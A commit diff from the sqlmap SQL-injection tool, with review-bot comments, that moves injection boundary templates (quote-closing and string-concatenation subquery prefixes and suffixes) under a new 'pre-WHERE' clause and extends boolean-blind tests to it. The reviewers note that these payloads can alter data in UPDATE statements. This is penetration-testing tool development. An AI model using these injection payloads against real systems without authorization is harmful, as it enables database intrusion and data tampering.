Commit 38fcc5a

committed
Update for pre-WHERE payloads
1 parent 674d516 commit 38fcc5a

6 files changed

Lines changed: 171 additions & 171 deletions


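--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -20,7 +20,7 @@
 from lib.core.revision import getRevisionNumber
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.0.4.9"
+VERSION = "1.0.4.10"
 REVISION = getRevisionNumber()
 STABLE = VERSION.count('.') <= 2
 VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")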

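--- a/xml/boundaries.xml
+++ b/xml/boundaries.xml
@@ -31,6 +31,7 @@ Tag: <boundary>
 6: TOP
 7: Table name
 8: Column name
+9: Pre-WHERE (non-query)
 
 A comma separated list of these values is also possible.
 
@@ -422,7 +423,7 @@ Formats:
 <!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
 <boundary>
 <level>5</level>
-<clause>1</clause>
+<clause>9</clause>
 <where>1,2</where>
 <ptype>2</ptype>
 <prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
@@ -431,7 +432,7 @@ Formats:
 
 <boundary>
 <level>5</level>
-<clause>1</clause>
+<clause>9</clause>
 <where>1,2</where>
 <ptype>2</ptype>
 <prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
@@ -440,7 +441,7 @@ Formats:
 
 <boundary>
 <level>4</level>
-<clause>1</clause>
+<clause>9</clause>
 <where>1,2</where>
 <ptype>1</ptype>
 <prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
@@ -449,7 +450,7 @@ Formats:
 
 <boundary>
 <level>4</level>
-<clause>1</clause>
+<clause>9</clause>
 <where>1,2</where>
 <ptype>2</ptype>
 <prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
@@ -458,7 +459,7 @@ Formats:
 
 <boundary>
 <level>5</level>
-<clause>1</clause>
+<clause>9</clause>
 <where>1,2</where>
 <ptype>4</ptype>
 <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
@@ -467,12 +468,48 @@ Formats:
 
 <boundary>
 <level>4</level>
-<clause>1</clause>
+<clause>9</clause>
 <where>1,2</where>
 <ptype>1</ptype>
 <prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
 <suffix>[GENERIC_SQL_COMMENT]</suffix>
 </boundary>
+
+<boundary>
+<level>5</level>
+<clause>9</clause>
+<where>1</where>
+<ptype>2</ptype>
+<prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+<suffix>)||'</suffix>
+</boundary>
+
+<boundary>
+<level>5</level>
+<clause>9</clause>
+<where>1</where>
+<ptype>2</ptype>
+<prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+<suffix>)||'</suffix>
+</boundary>
+
+<boundary>
+<level>5</level>
+<clause>9</clause>
+<where>1</where>
+<ptype>1</ptype>
+<prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+<suffix>)+'</suffix>
+</boundary>
+
+<boundary>
+<level>5</level>
+<clause>9</clause>
+<where>1</where>
+<ptype>2</ptype>
+<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+<suffix>)+'</suffix>
+</boundary>
 <!-- End of pre-WHERE generic boundaries -->
 
 <!-- Pre-WHERE derived table boundaries - e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->
@@ -549,44 +586,6 @@ Formats:
 </boundary>
 <!-- End of pre-WHERE derived table boundaries -->
 
-<!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
-<boundary>
-<level>5</level>
-<clause>1</clause>
-<where>1</where>
-<ptype>2</ptype>
-<prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
-<suffix>)||'</suffix>
-</boundary>
-
-<boundary>
-<level>5</level>
-<clause>1</clause>
-<where>1</where>
-<ptype>2</ptype>
-<prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
-<suffix>)||'</suffix>
-</boundary>
-
-<boundary>
-<level>5</level>
-<clause>1</clause>
-<where>1</where>
-<ptype>1</ptype>
-<prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-<suffix>)+'</suffix>
-</boundary>
-
-<boundary>
-<level>5</level>
-<clause>1</clause>
-<where>1</where>
-<ptype>2</ptype>
-<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
-<suffix>)+'</suffix>
-</boundary>
-<!-- End of INSERT/UPDATE generic boundaries -->
-
 <!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
 <boundary>
 <level>4</level>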
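Review bot: The four string-concatenation boundaries relocated into the pre-WHERE section (the `'||(SELECT '[RANDSTR]' … )||'` and `'+(SELECT … )+'` pairs) lose their only explanation, because the deleted `<!-- INSERT/UPDATE generic boundaries … -->` header is not carried over and the surviving `<!-- Pre-WHERE generic boundaries … -->` comment describes just the `… WHERE [RANDNUM]=[RANDNUM]` + `[GENERIC_SQL_COMMENT]` shape. Their mechanism is different and worth stating: the prefix closes the quoted value and opens a subquery, and the `)||'` / `)+'` suffix reopens the string, so the application's own statement including its original WHERE clause keeps running intact instead of being truncated by the comment suffix. I would add before the first of them `<!-- Pre-WHERE string-concatenation boundaries (e.g. "UPDATE table SET name='$_REQUEST["name"]' WHERE id=1"): the payload is spliced into the value with ||/+ so the original WHERE clause survives -->`. These four also keep `<where>1</where>` while the comment-suffix boundaries carry `<where>1,2</where>`; presumably deliberate, since an OR-style replacement inside the subselect cannot widen the outer statement, but a word on that in the same comment would save the next reader the question.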

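--- a/xml/payloads/01_boolean_blind.xml
+++ b/xml/payloads/01_boolean_blind.xml
@@ -53,6 +53,7 @@ Tag: <test>
 6: TOP
 7: Table name
 8: Column name
+9: Pre-WHERE (non-query)
 
 A comma separated list of these values is also possible.
 
@@ -159,7 +160,7 @@ Tag: <test>
 <stype>1</stype>
 <level>1</level>
 <risk>1</risk>
-<clause>1</clause>
+<clause>1,9</clause>
 <where>1</where>
 <vector>AND [INFERENCE]</vector>
 <request>
@@ -175,7 +176,7 @@ Tag: <test>
 <stype>1</stype>
 <level>1</level>
 <risk>3</risk>
-<clause>1</clause>
+<clause>1,9</clause>
 <where>2</where>
 <vector>OR [INFERENCE]</vector>
 <request>
@@ -191,7 +192,7 @@ Tag: <test>
 <stype>1</stype>
 <level>3</level>
 <risk>3</risk>
-<clause>1</clause>
+<clause>1,9</clause>
 <where>1</where>
 <vector>OR NOT [INFERENCE]</vector>
 <request>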
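Review bot: The new clause entry `9: Pre-WHERE (non-query)` in the tag documentation is too terse to act on, since nothing in this file says which injection points it denotes and the only concrete description is in the comment examples in boundaries.xml (`UPDATE table SET '…' WHERE id=1`, `INSERT INTO table VALUES('…') WHERE id=1`). I would expand it to `9: Pre-WHERE (non-query statements, e.g. the value position of INSERT/UPDATE - see the pre-WHERE boundaries in xml/boundaries.xml)`, and the identical one-liner added to boundaries.xml would benefit in the same way. A caveat is also due on the three tests now tagged `1,9`: paired with the clause-9 boundaries whose suffix is `[GENERIC_SQL_COMMENT]`, even the risk-1 `AND [INFERENCE]` vector becomes `' WHERE n=n AND … --`, which comments out the application's own WHERE clause, so on the UPDATE shape from that example either every row or none is modified depending on the inferred condition, which is not the read-only behaviour a risk-1 test suggests - a note such as `<!-- clause 9 pairs this with boundaries that discard the original WHERE clause; against UPDATE targets this modifies data -->` next to the clause line would flag it. The diffstat reports 6 files changed while only three are shown on this page, so presumably the other payload files received the same `1,9` treatment; I cannot verify that from here.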
